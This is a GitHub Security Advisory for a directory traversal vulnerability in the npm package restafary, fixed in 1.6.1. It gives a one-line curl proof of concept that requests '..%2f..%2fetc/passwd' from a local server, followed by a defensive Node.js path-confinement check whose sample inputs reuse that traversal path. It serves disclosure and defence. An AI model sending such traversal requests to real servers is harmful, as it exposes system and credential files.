GHSA-xg5r-8j97-2wrj

GitHub Security Advisory

Directory Traversal in restafary

✓ GitHub Reviewed MODERATE Has CVE

Advisory Details

Affected versions of `restafary` are susceptible to a directory traversal vulnerability when a root path is specified in the configuration.

## Proof of Concept

```
curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd'
```

## Recommendation

Update to version 1.6.1 or later.
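
For services that map URL paths onto a configured root, the following is an added example, not code from restafary or from the advisory: a Node.js root-confinement check that rejects the encoded `..%2f` path used in the proof of concept. The helper name `resolveInsideRoot`, the root `/srv/files` and the sample inputs are assumptions constructed for illustration.

```javascript
'use strict';
const path = require('node:path');

// Hypothetical helper (not restafary's API): map the part of the URL after
// /api/v1/fs/ to a path that is guaranteed to stay inside `root`.
function resolveInsideRoot(root, rawUrlPath) {
  let decoded;
  try {
    // Decode exactly once, before any check: the PoC hides "../" as "..%2f",
    // so a filter applied to the still-encoded string never sees it.
    decoded = decodeURIComponent(rawUrlPath);
  } catch (err) {
    return { ok: false, reason: 'malformed percent-encoding' };
  }
  if (decoded.includes('\0')) return { ok: false, reason: 'NUL byte' };

  const base = path.posix.resolve(root);
  // Prefix "./" so a leading "/" in the request cannot replace the root.
  const candidate = path.posix.resolve(base, './' + decoded);
  // Compare by relative path, not startsWith(): "/srv/files-private" shares
  // the string prefix "/srv/files" but is outside the root.
  const rel = path.posix.relative(base, candidate);
  if (rel === '..' || rel.startsWith('../')) {
    return { ok: false, reason: 'escapes root' };
  }
  return { ok: true, path: candidate };
}

// Constructed sample requests (the first is the path from the PoC above).
function runSamples(root = '/srv/files') {
  const samples = [
    '..%2f..%2fetc/passwd',
    '..%2ffiles-private/key.pem',
    '%2fetc/passwd',
    'docs/../readme.txt',
    '%zz',
  ];
  return samples.map((s) => ({ input: s, ...resolveInsideRoot(root, s) }));
}

console.table(runSamples());
```

The check is lexical only; if the root can contain symlinks, compare `fs.realpathSync` results as well before opening the file.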

Affected Packages

npm restafary
Affected versions: 0 (fixed in 1.6.1)

Related CVEs

Key Information

GHSA ID: GHSA-xg5r-8j97-2wrj
Published: February 18, 2019 11:39 PM
Last Modified: August 31, 2020 6:10 PM
CVSS Score: 5.0/10
Primary Ecosystem: npm
Primary Package: restafary
GitHub Reviewed: ✓ Yes

Dataset

Last updated: July 4, 2025 6:26 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.